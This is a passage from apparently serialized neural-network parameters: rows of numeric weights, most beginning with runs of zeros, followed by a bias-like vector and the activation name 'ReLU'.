0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.077, 0.3235, -0.1229, -0.283, 0.01266, 0.1287, 0.1332, 0.3232, 0.278, -0.0412, -0.177, -0.323, -0.435, 1.111, -0.12103, 0.04907, 0.4639, -0.1976, 0.62, 0.0499, 0.10767, 0.2822, -0.7393, 1.277, 0.01205, 0.333, -0.606, -0.2908, -0.1186, 0.2095, 0.2224, -0.04736, -0.595, 0.172, -0.1808, 0.7104, 1.393, -0.02988, -0.2751, 0.1567, -0.1687, -0.14, -0.263, -0.9434, 0.02678, 0.2515, 0.2227, -0.1987, -0.1763, 0.01875], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.09094, 0.4463, -0.123, 0.3286, -0.0476, -0.1814, 0.502, -0.978, 0.0276, 0.623, 0.277, -0.0385, -0.3323, 0.629, 0.5186, -0.3252, -0.553, 0.2734, 0.337, 0.01276, -0.2876, 0.0477, 0.1838, 1.164, 0.0006814, 0.1548, 0.1482, 0.382, 0.04318, 0.3865, -0.7036, -0.182, -0.2815, -1.664, -1.693, 0.0528, -0.3186, 0.04974, 0.1266, 0.764, -0.6855, 0.04602, -0.176, -0.111, -0.4282, 0.5986, 0.1731, 0.6006, -0.287, 0.3772], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2542, 0.02557, 1.008, -0.686, -0.4023, -0.9785, 0.1736, -0.2222, 0.05685, 0.0609, -0.3977, -0.3354, 0.3416, -0.01637, -0.2708, 0.04086, 0.0192, 0.07263, 0.544, -0.00943, 0.5015, -0.1869, -0.1644, 0.9155, 0.0005465, -0.8857, 0.1026, -0.01428, -0.02077, -0.5186, -0.2042, 0.3494, -0.5566, -0.5127, -0.4321, 0.009834, 0.9463, -0.005184, -0.1985, -0.2374, 0.4932, -0.4373, 0.0479, -0.603, 0.3625, -0.3997, -0.1484, 0.01091, -0.4514, -0.994], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4597, 0.5205, -0.1213, -0.7803, 0.1805, 0.02328, -0.2683, -0.5493, -0.1833, 0.535, 1.141, -1.056, -0.7, 0.6113, 0.2394, 0.1699, -0.06305, -2.045, 0.4517, -0.04675, 0.288, 0.0466, -0.763, 0.5234, 0.04572, 1.232, -3.32, 0.2632, 0.05145, 0.2632, 0.4834, -0.1472, -0.0885, -0.2776, -6.465, 0.2803, -1.282, 0.03702, 0.664, 0.3098, -0.4631, -2.338, 0.2334, 0.3926, -0.3792, -0.06073, 0.2355, 0.0953, -2.969, 0.07434], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.286, -0.8716, 0.888, -0.03644, -0.512, -0.002035, 0.01897, 0.2983, 0.2008, -0.0919, -0.5337, -1.114, -0.0766, -0.639, 0.966, 0.1421, -0.1902, 0.2417, -1.434, 0.0494, -0.134, -0.4092, -0.6523, -0.619, -0.01784, -0.8687, -0.4949, -0.3125, 0.3464, -0.469, -0.435, 0.7046, 0.766, -0.8525, -0.887, -0.286, 0.681, 0.04385, 0.488, -0.557, 0.303, -0.317, 0.1515, -2.43, -0.192, -0.6543, 0.4512, 1.332, -1.389, -0.3857], [0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.358, 0.749, -0.5103, -0.217, -0.851, 0.764, -0.05328, 0.621, 0.09863, 0.0637, 1.309, 0.1503, -0.4146, -0.3196, -0.8154, 0.471, 0.2001, 0.8447, -0.1958, -0.02063, -0.6, -0.067, 0.6055, -1.097, -0.00884, 0.613, 0.2585, -0.04776, -0.755, 0.0536, 0.276, -0.5806, -0.869, 2.04, -1.609, 0.11066, -0.0549, -0.03168, -0.491, -0.187, -0.794, 1.044, -0.05484, -1.204, -0.775, -0.0743, 0.585, -0.7627, 0.544, -0.3916], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0433, -0.4163, 0.1008, -0.1407, -0.0807, 0.2191, 0.2068, 0.0664, -0.1965, 0.2798, 0.1814, -0.2463, -0.219, -0.0522, -0.1426, 0.1259, -0.1252, -0.5283, -0.2163, -0.03458, -0.0947, 0.1876, 0.3228, -0.8477, -0.0008225, -0.2566, -0.1676, -0.3472, -0.0964, 0.1608, -0.549, -0.2386, -0.09143, 0.5713, -0.535, 0.11127, 0.4058, -0.01198, 0.0881, 0.06168, 0.0905, 0.0357, -0.08936, -1.876, 0.1412, -0.09894, 0.07965, -0.483, 0.1351, -0.1105], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.41, -1.625, -0.8267, 0.1311, 0.833, -1.075, 0.188, -0.01584, -1.3125, -1.323, -1.198, -1.695, 0.1656, 0.08136, -2.914, 0.2394, -0.2305, 0.6606, 0.2048, 0.03372, 0.641, -0.2003, -0.2275, -2.623, 0.00863, -0.5586, -0.387, -0.1405, -0.512, 0.885, 0.9043, 0.2925, 0.07227, 2.5, -0.8086, 2.094, -2.021, -0.0174, -1.586, 0.7256, 1.336, -2.592, -1.014, -2.652, 0.8687, 0.555, -3.023, -0.4062, -1.535, 0.3232], [0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.10815, -0.301, 0.1984, -1.152, 0.00948, 0.383, 1.008, 0.11536, -0.0281, 0.779, 0.5566, -1.017, -0.02216, -2.479, 0.5415, 0.1198, -0.593, -1.835, 0.7, 0.04706, 0.1948, -0.141, -1.206, 0.646, 0.04657, -0.1925, -0.505, -0.5415, 0.02715, -0.4045, 0.675, -0.1901, -0.6484, -0.8647, -0.04803, 0.721, 1.755, -0.02292, 0.575, -0.3223, 0.3481, -0.4053, -0.4304, -0.7236, -2.047, 0.3208, 0.272, 0.2827, 1.022, 0.3157], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2102, 0.3772, -0.4038, -0.2383, 0.01909, 0.433, 0.1594, -1.33, 0.02023, 0.3508, 0.3926, 0.3901, -0.12115, -2.125, -0.1937, 0.1399, -0.151, -0.12177, 0.1371, 0.04727, -0.02942, -0.3435, 0.588, -0.644, 0.02954, 0.1893, 0.2605, 0.2537, -0.6396, -0.1791, -0.1384, -0.3623, -0.553, -0.1299, -0.0658, 0.09595, 0.1874, -0.03955, 0.2773, 0.0442, -0.1653, 0.3694, 0.03308, 0.527, -0.4146, -0.632, 0.517, -0.3828, 0.11237, 0.1749], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06033, 0.0235, 0.2688, 0.575, -0.741, 0.4973, 0.2969, -2.045, -0.708, 0.6133, -1.046, 0.3096, 0.06155, -1.98, 0.329, 0.5234, -0.2751, 0.4075, 0.4407, 0.00952, -1.013, -0.1826, 0.10754, 0.12286, -0.0426, 0.3804, -0.1785, 0.014755, -0.138, -1.227, -0.289, -0.01859, -0.2734, 1.578, -0.0688, 0.06934, 0.615, 0.010574, -0.0698, -0.1624, 0.3472, 0.2059, -0.2815, -1.023, -0.312, -0.2091, 0.11456, 0.03238, -0.114, 0.01637], 
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00443, 0.84, -0.01004, 0.3213, -0.3052, -0.2188, 0.00436, -0.884, -0.1289, 0.1886, 0.198, 0.2693, 0.1595, 0.4707, -0.1456, 0.2773, -0.982, 0.4907, -0.631, -0.03125, 0.11816, -0.11475, 0.72, -0.056, -0.02571, 0.2467, 0.3857, 0.2834, 0.03265, -0.3206, -3.865, 0.1813, 0.8765, 0.3064, 0.5054, -0.674, -2.645, 0.02725, 0.2563, -1.022, -0.251, -0.02863, 0.2974, 2.363, -0.185, -0.5864, -0.0736, 0.544, -0.2084, -0.2925], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -3.02, 1.566, -3.146, -6.008, 1.688, -3.467, 1.368, 1.621, -0.788, -0.913, -3.46, -2.008, 0.95, -3.414, -13.17, 1.452, -2.133, -4.895, 1.285, -0.03177, 1.235, 0.2344, -2.643, 0.2383, -0.02342, -2.791, -2.041, 0.263, -0.1735, -2.11, -5.37, 1.476, -0.894, 1.996, -4.51, 1.346, -6.562, -0.0168, 1.007, -5.723, -0.0361, -7.03, -0.5415, -8.06, 0.2059, -2.016, -2.729, 0.3755, -7.09, -0.9956], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2306, 0.7812, -0.306, -0.2258, -0.5615, -1.46, -0.409, 0.12427, -0.07007, -0.1133, -2.633, 0.3147, 0.3054, -2.68, -0.7173, -1.061, 0.1975, 0.096, 0.6567, -0.01131, 0.011246, 0.4468, -0.3943, -0.4832, 0.02742, -0.0933, -0.0459, -0.1504, 0.0939, 0.2551, -9.34, -0.06006, -0.5913, 0.648, 0.2427, -0.0971, -1.19, -0.04352, -0.09204, -0.3098, -0.2037, -0.5664, 0.104, -3.393, 0.586, 0.02869, -0.2573, 0.2484, 0.4443, 0.04465], [0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0688, -0.6836, 0.2864, -0.677, 0.11237, -0.527, 0.2101, -1.302, 0.04153, 0.5044, -0.3936, -0.1538, -0.3513, -0.2375, 0.304, -0.0579, -0.5327, 0.5117, -0.5107, -0.03058, 0.00833, 0.1656, -0.1237, 0.3203, 0.01252, -0.789, -0.2338, -0.1139, 0.0768, -0.1501, 0.1897, 0.11993, -0.3152, 0.4346, -0.4802, 0.831, -0.878, 0.02423, 0.3567, -0.3364, -0.01886, -0.1709, 0.1153, -2.744, 0.2844, 0.06046, 0.3389, 0.4246, -0.02339, 0.2151], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4146, 0.1362, -0.0601, 0.3396, 0.05142, -0.271, -0.243, 0.3704, 0.1716, 0.2354, 0.1034, -0.4111, -0.0852, -3.932, 0.6377, -0.76, -0.1061, 0.2393, 0.0796, 0.00498, -0.514, 0.1649, 0.26, 0.3298, -0.005924, 0.683, -0.5044, 0.1625, -0.11084, -0.0598, 1.436, -0.2756, -0.01101, 0.1422, 0.02017, -0.3325, -1.348, 0.0476, 0.3882, -0.5713, -0.301, -0.1818, 0.08636, -2.037, 0.1423, -0.1588, -0.2148, -0.1921, 0.1063, 0.02852], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3247, 0.9165, 0.6216, 0.3577, 0.03452, -0.2761, -0.2012, 0.256, 0.1555, 0.1528, -0.06165, 0.09784, 0.1656, -1.778, 0.4568, -0.4392, 0.0387, 0.09937, 0.4631, -0.04483, -0.26, 0.156, 0.0991, 0.1202, -0.007835, 0.10016, 0.3716, 0.0494, 0.41, -0.3735, -0.877, 0.2832, 0.02834, -0.4678, 0.632, -0.4285, 0.5327, -0.004097, -0.2416, -0.15, 0.0774, -0.1871, 0.2432, 1.099, -0.275, 0.0731, -0.2878, 0.3145, 0.64, 
-0.1787], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.09, -1.809, 1.842, -1.126, 0.5303, 0.2023, 0.3762, -0.8677, -1.777, -2.098, -0.4575, -0.7373, 0.586, 0.10504, 1.729, 0.693, -1.317, 1.201, -0.3748, -0.0207, -0.3696, 0.4058, -0.9062, -4.95, -0.03815, -2.87, -1.096, 0.682, -0.2178, -0.5063, -0.2524, 0.785, -0.353, 3.352, -2.076, -1.452, -0.0877, 0.04953, 1.112, -2.725, -0.1791, -0.7075, 0.2637, 0.2153, -3.643, -0.2646, -1.415, 1.377, -1.853, -0.781], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3833, -0.02841, 0.08716, 0.09314, 0.1648, -0.364, 0.6514, -1.482, 0.01723, -1.825, 0.209, -1.352, -0.4336, -0.2399, 0.1262, 0.05307, 0.2345, -0.211, -1.25, 0.007072, 0.483, -0.8525, -0.1376, 0.866, -0.03674, -0.7812, -0.583, 0.582, -0.3928, -0.7734, 0.812, -0.5503, -0.2756, 0.632, -0.996, 0.6533, -0.2988, 0.01559, -0.5557, -0.812, 0.905, -1.694, 0.1559, -0.2773, 0.2124, -0.3733, 0.9204, -0.0701, -0.706, -0.6387], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.472, 0.837, -0.3308, -1.679, -0.2443, -0.4902, -0.173, -1.393, -0.5654, -1.067, -0.3154, 0.2452, 0.2617, 2.049, -0.9277, -1.979, 0.1511, -0.3008, -0.012436, 0.03906, 0.3442, -0.3425, -1.1045, 0.639, 0.04312, -0.335, -0.3933, 0.1962, -0.2319, 0.5024, -2.348, 0.10004, -0.3044, -0.3398, 0.6543, 0.1572, -0.4783, 0.0001484, 0.1891, -0.001793, 0.004566, 0.0614, -0.01662, -0.8657, 0.659, -0.642, 0.1868, 0.1376, 
-0.5264, 0.0994], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2903, 0.3057, 0.8643, -0.9087, 0.001756, 0.2086, -0.863, 0.5137, 0.2437, 0.3171, 0.4268, -0.8667, 0.2874, -0.3157, -0.3223, -0.561, 0.03265, -0.1437, -0.1368, 0.0312, 0.010895, 0.02956, -0.0177, 2.176, -0.01102, -0.2698, 0.03772, 0.279, 0.02757, -0.2494, 0.008064, -0.2263, -0.6157, -0.4915, 0.5757, 0.0983, -0.0836, -0.01209, 0.7305, -0.1699, 0.02881, -0.0834, -0.1295, -1.447, 0.1484, 0.339, -0.5024, 0.0558, -0.0847, -0.3425], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2915, 0.97, 0.3232, -0.6333, 0.1907, 0.937, 1.078, -4.59, 0.1053, 0.7026, 0.10114, 0.4236, -0.577, -7.02, -1.088, -0.967, -1.807, -0.702, 0.3384, -0.02473, 0.599, -0.717, 1.337, 1.598, 0.0344, -0.753, 0.738, 0.5054, 0.315, -1.471, -7.406, -0.2266, -0.4695, 1.079, -2.383, -0.814, 2.732, 0.01715, 0.2827, 0.5225, 0.01575, 0.516, 1.111, -15.95, 0.741, 0.3887, -0.8677, 0.5293, -0.4014, -2.7e-06], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.11456, 0.10596, -0.1561, 0.57, 0.0791, 0.02495, -0.1442, -5.15, -0.2761, -0.2426, 0.823, -0.0894, 0.09924, 0.11646, 0.0494, 1.183, 0.3093, 0.6953, -0.3071, 0.047, -0.2493, 0.2288, 0.02953, -0.03214, 0.01709, 0.1775, -0.1587, -0.072, 0.2517, -0.3228, -0.87, -0.06836, 0.069, 1.1045, 0.6587, 0.1417, -0.6426, 0.02275, 0.3005, -0.6133, 0.0616, 0.3508, 0.4214, -1.809, -0.3625, 0.1562, 0.81, 0.4946, 
0.363, 0.1349], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3054, -1.368, -0.897, 0.1632, -0.05377, -1.768, 0.1986, 0.96, -1.314, -0.3748, -0.3796, -0.02885, 0.679, -1.086, -1.005, 0.2426, -0.0888, 0.2822, 1.39, 0.01897, -0.1305, -0.2227, 0.04395, -0.6577, -0.0402, -0.1378, 0.1854, -0.103, -0.525, 0.792, -2.309, -0.1306, -0.2106, -2.225, -0.2247, 1.789, -0.52, -0.02718, 0.305, -3.105, -0.00898, 1.136, -0.08875, 0.9873, -5.09, -0.4507, 0.3113, -0.3901, 0.324, 0.3289], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01912, -0.4185, 0.4524, -0.2385, -0.1127, -0.2352, 0.2128, -1.096, 0.363, 0.1176, -0.1827, -0.09753, -0.01613, -0.3674, -0.0915, 0.1016, 0.0974, -0.5366, 0.1239, 0.02193, 0.2778, -0.2252, -0.1117, 0.7603, 0.02156, -0.11633, -0.04678, -0.3137, -0.1954, 0.0396, -0.2944, -0.00553, -0.2249, 0.06247, -0.3013, -0.261, 0.6743, 0.02376, 0.01689, 0.006226, -0.1656, -0.1055, -0.1615, 0.6177, 0.1819, -0.2343, -0.2404, -0.2473, -0.3657, -0.09393], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.091, 0.2566, -0.609, 0.1831, 0.04733, -0.7593, -0.1556, -0.1194, -0.4922, 0.2229, 1.013, -0.433, -1.45, -0.3005, 0.4607, 0.2703, 0.1632, -1.076, -0.1677, -0.003279, 0.353, 0.4556, -1.268, 1.358, 0.04663, 0.124, -0.93, -0.7817, -0.5093, 0.1431, 0.4143, -0.4055, -0.05917, 0.447, 0.808, 0.562, -0.2502, -0.01169, 0.1431, 0.03616, -0.126, -0.4087, -0.04987, -2.154, 0.7627, 
0.1257, 0.3618, -0.5845, 1.014, -0.315], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02344, 0.7256, -0.385, -0.3064, 0.3694, -0.7393, 0.5264, -0.7725, -0.1715, 0.919, 0.3506, 0.01889, 0.03296, -0.138, -0.6123, 1.415, -0.791, -0.3955, 0.214, 0.02083, 0.1428, -0.008286, -0.1982, -0.9307, -0.007812, -0.583, 0.3618, -0.1271, 0.2001, 0.2362, 0.593, -0.0179, -0.2073, -0.5557, -0.2379, -0.04346, -2.248, -0.04724, 0.5693, -0.359, 0.04895, 0.2742, -0.05423, 1.338, 0.04678, 0.1089, 0.01304, 0.2289, -0.4214, 0.0427]]
[-0.813739, 1.72039, 0.302293, 1.22807, -2.23986, -1.1174, 0.783662, 0.661371, 0.534477, -1.03214, 2.02122, 1.36008, 0.352529, 0.608458, 1.16055, -0.143968, 0.602132, -0.0770681, 0.261715, 0.13249, 0.372844, 1.98032, -0.802868, -0.0581481, -0.704703, -0.635125, -0.149022, 0.40108, 1.27893, 1.22631, -1.09028, 0.74986, 0.949662, 0.399549, 0.833291, -0.641165, -0.737972, 0.902937, 0.995831, -0.997608, -2.65635, 0.436614, 0.190683, -1.20486, -0.93302, -0.844626, -0.537734, 1.46314, 0.378352, 0.768337, -0.814, 1.721, 0.3022, 1.229, -2.24, -1.117, 0.7837, 0.661, 0.5347, -1.032, 2.021, 1.36, 0.3525, 0.6084, 1.16, -0.1439, 0.602, -0.0771, 0.2617, 0.1324, 0.3728, 1.98, -0.8027, -0.05814, -0.7046, -0.6353, -0.149, 0.4011, 1.279, 1.227, -1.09, 0.75, 0.9497, 0.3997, 0.8335, -0.641, -0.738, 0.903, 0.9956, -0.9976, -2.656, 0.4365, 0.1907, -1.205, -0.933, -0.8447, -0.5376, 1.463, 0.3784, 0.7686]
ReLU
